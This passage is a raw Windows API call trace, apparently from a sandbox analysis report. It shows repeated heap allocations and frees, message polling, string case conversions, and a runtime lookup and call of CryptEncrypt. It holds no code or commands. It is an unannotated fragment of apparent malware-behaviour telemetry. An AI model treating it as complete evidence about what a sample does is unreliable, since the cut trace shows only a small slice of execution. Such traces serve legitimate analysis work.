dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.258] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.258] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.258] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0252.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.258] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.259] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.261] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.262] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0252.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.263] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.264] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.265] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.265] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa6a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.273] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0252.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0252.273] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xa2ab, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xa2b0) returned 1 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 